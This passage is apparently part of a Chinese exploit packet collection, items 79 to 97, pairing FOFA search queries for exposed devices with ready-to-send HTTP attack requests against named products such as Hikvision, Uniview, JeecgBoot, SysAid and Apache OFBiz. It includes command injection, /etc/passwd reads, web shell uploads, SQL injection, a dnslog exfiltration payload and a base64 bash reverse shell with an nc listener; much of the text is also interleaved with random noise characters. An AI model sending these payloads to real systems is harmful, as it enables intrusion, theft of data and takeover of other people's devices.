Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l8 O0 W% o  [) m& m
+ D- b8 U9 E% \9 o; U* X
------YsOxWxSvj1KyZow1PTsh98fdu6l
7 ~( a7 c2 j) XContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"2 L$ S1 ~! z" r) Q
Content-Type: image/png, S6 S" S: S+ x# Z! R3 i
: A( Q0 I3 |7 i
YsOxWxSvj1KyZow1PTsh98fdu6l
# E. d1 m/ A+ a+ e' E! D9 @6 M$ ?------YsOxWxSvj1KyZow1PTsh98fdu6l9 F/ d5 ]: f/ Z) b8 H
Content-Disposition: form-data; name="target"
5 l# y) W" X; w4 L. E0 Q
5 r; U: X6 Z+ _$ L$ S! }: w/Applications/SkillDevelopAndEHS/
+ j  Z3 g, w# v------YsOxWxSvj1KyZow1PTsh98fdu6l--
8 ]/ j& Y3 v0 ^8 O  I6 k5 G4 D2 b- W

5 Z' p7 d3 b( gGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1) N" t+ P: N$ i: }2 ]4 L' y' l
Host: x.x.x.x
0 z( j0 `/ X1 ?0 U: p% P# c
' b5 C7 k) x% W) Q* f4 M
* }- i8 o; c) ?! l' d79. BYTEVALUE 百为流控路由器远程命令执行; A; _, p) D' G6 O4 p. {
FOFA:BYTEVALUE 智能流控路由器( b% J+ v( _1 G0 V. S+ Z9 \
GET /goform/webRead/open/?path=|id HTTP/1.17 t5 d' A. A! T) F
Host:IP
# j1 R# ?% y! r5 e6 C& dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 x2 r: j, g* gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# \2 s; ^3 A% k8 f, N/ YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# \! H3 b% K+ G9 m( [0 [Accept-Encoding: gzip, deflate
: ~  Z( t" M0 Q( G3 vConnection: close4 J# Q( g" T4 H! f* y8 R( D% q
Upgrade-Insecure-Requests: 1
% ^" @. k- w2 n5 g3 I9 x0 k5 L* H. k4 s( A$ U* K

6 g. n4 k8 B% ]8 g4 V5 b80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传, l: Z8 L0 }) n
FOFA:app="速达软件-公司产品"
% {. h; l' h+ m7 ?% L! G3 YPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
; w. k; h, e) y( a3 dHost: x.x.x.x; k& u4 E* b9 G, [* I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" I4 S, H  {5 d* g
Content-Length: 27( v, H6 x# Q, p* J" ]. Y. Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ U" g! a; H9 z* Y9 V7 A9 `# z# GAccept-Encoding: gzip, deflate  r# J: ^) G7 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- ?0 ^) l5 U+ }( D5 GConnection: close: k) h# _. T# k3 p" K) F2 z+ L
Content-Type: application/octet-stream4 [. L5 Y& h- ]; @8 f( F
Upgrade-Insecure-Requests: 1' N, F& K) u3 A# N5 M# m
5 e& z5 T) r* ~* k
<% out.print("oessqeonylzaf");%>( j! w: E, J( j  f

0 f3 G5 q/ h) n) w) e, Z; l) G& z2 K/ K. ?% n  w. x
GET /xykqmfxpoas.jsp HTTP/1.11 `4 M( g0 Q( o1 _6 N$ I
Host: x.x.x.x/ ~/ y" O: z2 [6 e5 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 T) e+ o  G' U/ z& A9 I
Connection: close0 B. {+ A% M. X* b; g  G( o& @
Accept-Encoding: gzip
* a! S6 ~  y) F; W2 P$ z. M6 u
+ x3 \% i0 }' X3 _& g( F+ C. `3 ?8 d7 W3 O6 g" Z) O
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
+ ?. c  h& S( @! P7 w# |  L/ {: U/ TFOFA:app="uniview-视频监控"
3 `6 C' H: }8 d$ y  e/ DGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
$ E0 F. u7 k% z3 ]- ^" E! MHost: x.x.x.x# b3 k1 `4 R; F" H  A( a! R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" a. m8 n8 J2 b4 ~% f% R
Connection: close
5 z7 I% J& [! F, @; z5 m! z* dAccept-Encoding: gzip
+ H, ?2 v: P+ G* c& S4 x! q7 t. H# g# R$ p

, E6 k2 c! F# y9 z, M6 t& p5 D82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
# s; y/ `. y; B0 VFOFA:app="思福迪-LOGBASE"
, {3 ?1 I+ _$ M- C6 U- OPOST /bhost/test_qrcode_b HTTP/1.13 H" g* K6 y3 T; X% c- S
Host: BaseURL
) z* M- A7 @! ~! p* S* gUser-Agent: Go-http-client/1.1
0 A" u  _+ Z- X' a+ l  zContent-Length: 23  X3 W; N/ r6 L9 F7 r
Accept-Encoding: gzip$ L3 I) ?( s. `! b9 b+ K# L
Connection: close& A; ?: D7 s* f9 h; U/ H0 r# H, w
Content-Type: application/x-www-form-urlencoded, `2 Z8 \. F8 H; K8 y
Referer: BaseURL
1 @& ]+ Z0 o" h- {5 A; k
  Y- A' f; V7 n6 H1 ~$ `8 Sz1=1&z2="|id;"&z3=bhost7 o; `1 ?0 t( m4 r: \2 G
- T7 s$ i4 p) j- J6 ~$ E

  ]# @$ l0 |, U! r7 _" w83. JeecgBoot testConnection 远程命令执行3 \7 Y4 p; W  {7 ?
FOFA:title=="JeecgBoot 企业级低代码平台"
; o- s( Q/ h, \2 R8 }) v
# l$ h5 U# B# t. A: ]) Q1 |4 D% [0 }
POST /jmreport/testConnection HTTP/1.1
8 S1 S1 E5 y& J. tHost: x.x.x.x9 ]# R/ t3 A9 [! [' a' V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; z0 s! B8 m: J$ e; |Connection: close
) ]! F( d9 k, K6 o7 b( yContent-Length: 8881
$ [/ }% X& b1 u8 y5 `0 cAccept-Encoding: gzip
+ i& G9 }4 a2 Y; Q0 PCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO". v9 [. l, R7 F# V4 _
Content-Type: application/json
" P$ u2 Y. Q3 h: p2 G( k
6 e6 S( |; n# T; Z/ kPAYLOAD
% F8 f) s' D! D$ d8 w- |$ v* `/ Q/ ?5 ~/ ]$ ^
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
+ c( [' Z" J. s6 ~FOFA:title=="JeecgBoot 企业级低代码平台"9 Z$ j& j. Y& d  m1 y- ?
) [5 R1 H( ^* [, E

* j( u5 ?2 J4 e9 ], T. Q
- A$ l; f- G( a! nPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1+ x- @: R- ?* c; R5 p9 S
Host: 192.168.40.130:80802 O6 I& b/ c$ W
User-Agent: curl/7.88.1
; @; R' c" A. }% _Content-Length: 156$ d; v$ X% b6 M( H) S" F4 P
Accept: */*% I6 i& l; v, Q6 x6 L! o0 B
Connection: close3 a2 r' g+ @" s9 ?  M9 G
Content-Type: application/json
* u/ ]5 r, B, B- Z8 vAccept-Encoding: gzip
' k8 n* N: v2 M3 v, Q: G) W0 }
{
8 O/ k+ b* c( {7 b) T1 [0 k "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
/ _; Z* o/ f$ O0 e! u  "type": "0"  d2 O# v1 O. a% s; ~
}0 h1 {/ |( G8 {

3 r" H# h) k# m" X3 F
; G6 O4 D2 F( [0 n6 \85. SysAid On-premise< 23.3.36远程代码执行
3 ~' W' H# R6 f% C2 u! e; e! x- eCVE-2023-47246; X; T3 i* f, L% U6 H* @
FOFA:body="sysaid-logo-dark-green.png"
/ C& w& m2 |/ o3 H3 lEXP数据包如下,注入哥斯拉马" \% ^7 e& r+ r' Z( b0 E
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
, r! D+ u2 ?. O) Z" b& y  c& QHost: x.x.x.x
7 C+ N4 f% Y# f4 b* P; tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& V4 d# N" _. M
Content-Type: application/octet-stream. Y' y4 z& D# h
Accept-Encoding: gzip
) M% e3 B) W" v& P4 P) A9 U& i) v1 V4 H& }8 Q
PAYLOAD
- l* J" q: ~; s" \, k3 j
8 a$ b2 q0 J4 w  m$ g回显URL:http://x.x.x.x/userfiles/index.jsp
# h2 r/ a. q7 w8 X8 b( H
) h+ G/ T* T- F/ `86. 日本tosei自助洗衣机RCE2 |1 t0 S8 @6 t% u- Q
FOFA:body="tosei_login_check.php"
0 e9 z5 t* W. v( E8 ZPOST /cgi-bin/network_test.php HTTP/1.1
. q& X8 o" @" I; r6 r3 _Host: x.x.x.x( g3 P6 ~, ~6 D- r% g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 [7 w( n" X# `3 bConnection: close
* \" D4 }" K- S, ~) `0 v/ m+ J/ P- mContent-Length: 44, s) [) ], i+ Z1 u
Accept: */*
3 V1 T6 C" P7 N9 A8 AAccept-Encoding: gzip
8 e0 {6 A+ a1 _( ~Accept-Language: en, ^8 C3 o0 |# ^; |- }
Content-Type: application/x-www-form-urlencoded
) v6 c3 q$ n0 w( s* w% f/ @
& q$ d8 ^: G: O# u& Vhost=%0acat${IFS}/etc/passwd%0a&command=ping
4 }. t/ L  f, E  `" x7 n. O; Q; s6 h* _! j" K# P$ [6 s

2 N8 o; x6 A8 h87. 安恒明御安全网关aaa_local_web_preview文件上传# M) ?1 z# ^( S5 W% p! I
FOFA:title="明御安全网关": F) m% c0 t2 N9 K. Z
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
8 z% A3 j" e4 [% O8 @3 Q- RHost: X.X.X.X
( A$ f) n5 `/ [/ i, T! [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 u$ Q) P" \& T( R6 i) e7 J2 JConnection: close
. V2 }1 l* V& \0 }$ bContent-Length: 198
8 d* d% }9 _! ^. l- C6 aAccept-Encoding: gzip
& K2 ^3 s* k) w$ X) MContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd* Q" ~7 O3 _' j

6 T% B5 ]0 R& S% n4 O# j" ]--qqobiandqgawlxodfiisporjwravxtvd: f. T' f0 C+ N2 q3 r7 p) u. X6 v
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"- v8 i  u! J, U$ r2 x
Content-Type: text/plain$ o3 i3 A6 T9 n& l4 r  R

; \3 o/ d* v4 G0 ]8 N2ZqGNnsjzzU2GBBPyd8AIA7QlDq$ o, G9 m! w8 e7 k* _+ r  A  U
--qqobiandqgawlxodfiisporjwravxtvd--
& Z$ l+ q/ C" e4 Q+ t3 J4 T* Y8 s# |5 v+ g3 {
! v* r, c: ]: m/ G# W: a* ~
/jfhatuwe.php
4 l. I% B" U  g& C, t6 _- h/ V0 x+ [$ o% P; S) c
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
+ |3 v1 N6 O+ {% o) _FOFA:title="明御安全网关"
8 U& ?6 F- ^- V: \: G$ rGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
3 W' [% {9 s8 r: `: `% s+ J  R: _Host: x.x.x.xx.x.x.x) B8 l9 M/ |/ ?5 w& V7 `1 v' e" G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( F5 K( Z! s" [# ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 Q# r! {1 j6 l/ Z7 A
Accept-Encoding: gzip, deflate
; ~9 N! z# S8 B& T. {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ n, Z, n* D: |+ X( L, C2 CConnection: close9 a: x0 ~; H+ y  L; h

% W: G) w7 X8 {  x$ [% h5 q# I1 ^, @* l
/astdfkhl.php% p" L7 f* f1 `: ?
- ~8 f/ b( {) e7 K1 |
89. 致远互联FE协作办公平台editflow_manager存在sql注入
4 h/ L3 z- S! H9 c2 k6 o5 v4 J* EFOFA:title="FE协作办公平台" || body="li_plugins_download"
( Z- J' u7 ]; N2 t0 gPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
# S0 n) w+ d/ z  e2 T- V; T; `. @9 DHost: x.x.x.x5 Z( E" l: b) U4 c0 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 Z5 `4 O$ g8 P+ p: h# ^2 N
Connection: close
$ }- \' ?% C. O: x/ M9 e+ B" O& ?! LContent-Length: 41
- h7 y; ?/ L2 O' ZContent-Type: application/x-www-form-urlencoded2 w( c0 D# J" U
Accept-Encoding: gzip4 y2 c/ l+ z- A( v5 I' b; w/ ]

) |% N  |5 W: noption=2&GUID=-1'+union+select+111*222--+
: P* b! b( n& v$ {; E% _5 x' s# ]3 |1 F8 J5 X

' ], Q9 w1 ?! y2 I  J; S90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
; j, D; B9 Y0 z5 `) EFOFA:icon_hash="-1830859634"
0 G4 v* x! W/ Z( g0 q: J7 FPOST /php/ping.php HTTP/1.1
$ Y# V* F+ P3 h) \: zHost: x.x.x.x/ m# g- X0 u1 i. w4 K4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
" e+ t; X! H6 l( \Content-Length: 51
# y, `( ]) G* gAccept: application/json, text/javascript, */*; q=0.01
2 q# u. {& N: CAccept-Encoding: gzip, deflate- E% _$ d5 j5 u4 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 U: |7 @# U+ l! a! {% w
Connection: close4 u+ k9 Z+ `/ L/ [4 ~
Content-Type: application/x-www-form-urlencoded
% Y6 e( Q$ w- T+ J' `X-Requested-With: XMLHttpRequest, h( ~: z1 r* s5 S) V0 ?' z* x

/ S) W) Z" F1 ]8 h4 vjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig& v# C4 p+ t5 h0 M" K) D

; i- Z* G' x4 p. R( h% r
3 U1 Y9 m$ t. v91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: k) y+ {' _6 }/ ]) s
FOFA:title="综合安防管理平台"
" S* Y1 m9 i1 D! R( _0 T; d  XGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
6 s3 H6 n- X+ W# w6 D. lHost: your-ip
- h* h1 |9 r- zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36  N2 X* k! c0 c( P! a% Q& F. G
Accept-Encoding: gzip, deflate
( t. B% x  u) }9 I+ SAccept: */*
( w3 j6 X, k5 H7 m# UConnection: keep-alive; I, N  f7 p# K5 W% J8 [, A

) S' B% l% a" v2 b9 b* G. ]8 t# r! |! Y" }  g( G

8 A0 s/ s" F! d92. 海康威视运行管理中心session命令执行+ [; F% I2 z' Y# M4 b" k* ]  g
Fastjson命令执行
# i6 y! B, f% A) Vhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
4 _2 o% I! y) ]" h) nPOST /center/api/session HTTP/1.1. U+ A/ _% L- L' U, y
Host:/ r" `0 d& N. D% v; s$ j" ~
Accept: application/json, text/plain, */*) }" b: S( @* z3 \; T
Accept-Encoding: gzip, deflate, |8 e% K) F% V( x6 N
X-Requested-With: XMLHttpRequest
2 \; q" a: r5 N% I2 ^Content-Type: application/json;charset=UTF-8/ @+ F, r0 j0 T4 i8 S1 j. w
X-Language-Type: zh_CN
. w1 I$ A3 P$ CTestcmd: echo test
  U2 Z) @2 F1 h- U3 w( sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36! F* a; \  C5 `! ^% V% j7 C
Accept-Language: zh-CN,zh;q=0.9, b' }$ _7 z! ^0 r
Content-Length: 5778
5 o( E5 t6 Y/ ^0 }8 n8 C' B+ C
2 y- N* ~6 M, Y. O( {9 U* XPAYLOAD
( h6 n& M8 b, o; |4 i6 M. k( ?* c/ L/ z; A6 Z8 e: W) j$ w
; W1 G( v( }& S+ h
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ G; ]7 G( ^9 ^; CFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="' d' i7 G* i/ u& J0 C
POST /?g=app_av_import_save HTTP/1.1; {/ U4 g+ B8 y1 V9 V# L$ l& j
Host: x.x.x.x: Z" k! W, X8 K2 n- F# i$ q  P% a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx) u+ V1 O) P. ], R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" o) n# B& ]: _- n9 x/ Q$ [* V
7 P9 Z0 u9 m- V5 O' ~! ?+ j6 D------WebKitFormBoundarykcbkgdfx/ {' U! m  y. J
Content-Disposition: form-data; name="MAX_FILE_SIZE"
4 X- A. w3 I( E# L( U# o
, X' J; D4 p& q4 }4 b: b100000007 ]+ b1 v& M$ Y, |! D! U
------WebKitFormBoundarykcbkgdfx
/ X# k6 W4 k5 S6 a! d& D" AContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
) [$ m  I* l, }# h5 G* u" `  VContent-Type: text/plain
& S( K" F. _! \8 a' B7 R$ k1 c7 Y5 \7 |7 |5 ^
wagletqrkwrddkthtulxsqrphulnknxa$ C0 P( o2 ^7 l+ ]- h/ N
------WebKitFormBoundarykcbkgdfx
7 E; f" E) m1 NContent-Disposition: form-data; name="submit_post"
9 L. h5 _; |, N4 h5 ~
$ n5 S! R; Q8 Z/ y5 t+ iobj_app_upfile0 B/ I* z: d# i9 w3 N) _
------WebKitFormBoundarykcbkgdfx6 }, i9 l1 }- N& F- i3 @- K; v
Content-Disposition: form-data; name="__hash__"& p$ n8 g5 T5 Q+ g

, X5 i1 f* Q/ f9 y# P5 T" g% t5 {0b9d6b1ab7479ab69d9f71b05e0e9445: v8 C- a) ~+ v! K1 {  L
------WebKitFormBoundarykcbkgdfx--* k( f+ o) g: L0 ~' N7 k' w! ^

4 ]( _' m% _0 [9 Q, F! B# f  l; @
GET /attachements/xlskxknxa.txt HTTP/1.1
- G- I/ W2 P. W, S( P) X# t9 w: SHost: xx.xx.xx.xx: g' o! x3 T; L( _8 n# V9 P; u- @# U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" B. I) Y! O. w' g) d  F0 A" l3 c- g; o

: c* Q- o0 K& N6 q* u94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
7 O7 Z6 X% r( w; ~4 F# V4 f- RFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="$ d% c5 o8 V3 Q7 H6 M
POST /?g=obj_area_import_save HTTP/1.1
2 V# I0 p. {6 x% w# S7 F; ]/ [Host: x.x.x.x
+ m; [: E4 c3 v$ l8 Y# u5 c  LContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt  M( t# Z7 H- o: i, a) k' Y+ M2 \/ I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" ^+ P; ^) X2 c0 R
, J1 D4 E, |# J4 C
------WebKitFormBoundarybqvzqvmt
+ \/ N7 R* D: y0 F2 ]Content-Disposition: form-data; name="MAX_FILE_SIZE"
  [9 o# i5 U4 `5 y5 I5 u9 L/ ^
+ o- z: d+ H' k2 ^) h+ u8 n10000000
6 h8 A" s8 u+ V3 o) \------WebKitFormBoundarybqvzqvmt2 m0 i) b! ?1 j
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
8 Z3 M% @) j6 A' A) FContent-Type: text/plain
/ r9 U- d' w/ @5 W+ t! w& S7 h1 T- B: C# F) @) R
pxplitttsrjnyoafavcajwkvhxindhmu, A8 [; D& \7 m" d3 R
------WebKitFormBoundarybqvzqvmt
+ q6 i$ l1 }! [. yContent-Disposition: form-data; name="submit_post"
( E4 s, f3 j% ?, F4 g! ?. L* I: ~" F$ x$ M7 k
obj_app_upfile
' A  g; l/ D4 t7 B6 p0 X/ C2 K" g------WebKitFormBoundarybqvzqvmt
, C$ B) Z2 e7 a0 D, nContent-Disposition: form-data; name="__hash__"  `- h% j/ j* X$ M" d
% K' [/ W( k1 Y* a3 F( l
0b9d6b1ab7479ab69d9f71b05e0e94450 t5 I6 X- z! j9 w
------WebKitFormBoundarybqvzqvmt--( ~+ p* y) m5 n% K  E, ]" H$ k7 ?
0 n1 `8 Y6 S7 V* W
: J1 W6 U- M; s6 S! I! ~% P1 v
9 Z! x5 g! t0 k5 ?$ A1 E
GET /attachements/xlskxknxa.txt HTTP/1.1
0 w, z( Y; i; ?Host: xx.xx.xx.xx
; I5 {5 j: s% JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 U# ]7 [5 G- W4 \- {: L8 d  E% c1 {8 y3 \* w5 ~# R5 g8 f
! A, r, k1 l/ n5 D' J

. n' s; Q$ a6 ?95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
9 W$ D4 j4 {* V0 H, Z& O* ICVE-2023-49070
6 K! j: H" y% c# GFOFA:app="Apache_OFBiz"
. Z- G9 q+ {5 K2 W8 T) v' rPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
9 V$ S/ Z4 q- A0 p& a) P8 CHost: x.x.x.x9 I. g9 ~; d0 b( ^1 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 \$ V* V" c* N  O7 l7 B& x
Connection: close# P/ j4 \& E" a
Content-Length: 889
8 p  Y/ Z9 J: s8 ]' [5 ^5 G9 ZContent-Type: application/xml
3 \1 r+ `9 V, O) g' gAccept-Encoding: gzip
4 t5 @( y: x3 N$ H7 y' I6 L1 d2 v# ~) X" |( P
<?xml version="1.0"?>
$ h& R& |+ X) z; H7 w( a/ C<methodCall>
. k4 _  j, S( [   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>- W1 v3 k" |# o* Z" ]1 S
    <params># Q: K1 a3 W/ x  J- I4 k0 J
      <param>/ x' S1 s9 q3 {& i- t3 c3 b
      <value>
9 t0 h/ z. E5 \  t5 R1 `        <struct>
! m! y, o" t  H3 ^0 C0 [* ?       <member>
/ w$ p  d$ K/ d8 `2 }          <name>test</name>
: Y! n1 z4 D( t! |8 `. a; O9 ~  {          <value>
* O. f0 S8 Z7 @7 M) Z      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>) Q8 T  ~/ Q; ^8 J8 d
          </value>% `# i: ]5 v# J& \/ Z9 u2 f
        </member>+ m3 B6 |% b5 r" v
      </struct># r5 ^1 i* O, O
      </value>
3 b) U0 R0 K  f    </param>  D6 ~0 q0 D, f- F( i
    </params>
) F) |( _, L/ p, M4 B! Q</methodCall>
2 q% K9 l/ Q9 H$ g6 k( P; |9 j$ B$ u
1 l6 t* Q1 B- T7 q5 K# B
' E' d. ~+ B$ ]用ysoserial生成payload
' A2 K1 A% L* t1 n) Njava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"3 Z6 c. R: o: u0 ?& U3 Q# P8 T

) {5 L; ^% s. N$ z0 [- J! H! s$ Q1 g8 N  w  }
将生成的payload替换到上面的POC+ e. c0 j' w1 ?
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1. C- P/ S9 n5 I* v' z
Host: 192.168.40.130:8443) G$ R( O, m4 K$ V% b$ H; z% z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ h$ A7 y& F  P4 f3 J- CConnection: close9 T- B- N4 n, N+ `, t- M' C
Content-Length: 8899 G( o2 J6 X* q, i3 n. l
Content-Type: application/xml
2 \: B" F. C& R( y% E+ ~Accept-Encoding: gzip
7 }  n1 V+ z; W  l/ E3 a# r
+ I) w* ^0 G9 o6 X' d6 }. x* hPAYLOAD$ v* R3 J( W9 f2 n$ z- R% p
/ n, X. v8 H, ]
96. Apache OFBiz  18.12.11 groovy 远程代码执行
5 ]4 P6 @3 C# n! _FOFA:app="Apache_OFBiz"
! E) y$ v( j) r# M1 M& MPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; j# `4 y; _1 B8 Z# z6 }
Host: localhost:8443
1 e' U1 U- _3 }7 g+ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 s/ B8 U0 \# \+ A' j
Accept: */*& j8 w* v4 y. z' x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& o0 R* Y2 H, l+ P
Content-Type: application/x-www-form-urlencoded
4 g' B$ |6 A5 q) q- \( I' Y& v* E/ AContent-Length: 555 A6 l6 g8 @) l7 p& g2 w9 j6 c6 t
  x& R: x- h6 s1 w- c& z
groovyProgram=throw+new+Exception('id'.execute().text);  S* a8 h6 k6 C% E/ `1 J' ?) _

; l2 \( V( p# y. ]; d/ L# ?
' |" {9 W: W; q反弹shell
7 Z% f: a- J7 y1 Q0 [7 @% |在kali上启动一个监听" T) C% |9 f6 d* {: m
nc -lvp 7777: Y$ ?/ u* {! R4 b
" b3 B) t) y! J0 G! q( l
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
) H6 }, O$ c; G8 D/ E9 ?Host: 192.168.40.130:8443* I( h5 P+ u! z7 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ k: U' I4 ^: J) v$ q' |
Accept: */*; O$ Z9 G/ k3 ]6 {0 b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' V& ?& t# t/ R0 A/ r' t4 O; s/ oContent-Type: application/x-www-form-urlencoded
0 M' Y  e: J  v' EContent-Length: 71/ R7 \2 o# R, H$ K5 X
8 w  D" D2 H: j
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();$ A% |  k) M1 N, N

/ e/ M- V/ d% F( }# U97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行. t: p9 F/ U: [! c
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
; P& \, f0 ?( C& _7 eGET /passport/login/ HTTP/1.1: A1 v( e/ @) @( y& A8 {' N
Host: 192.168.40.130:8085& f" |9 o8 V9 O6 w4 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' [% g% s" n1 C0 R! p1 T, t3 x8 bAccept-Encoding: gzip& y4 J6 `4 ?+ i$ t8 [) h. X
Connection: close/ k$ U% D8 j/ Q" f" K, n! N8 ^# t
Cookie: rememberMe=PAYLOAD
2 h3 ], Z! ?) E, HX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk", S9 H, t7 u! }
7 i8 y  g9 F1 A* R- N& D' [: Y, w* ^6 ?

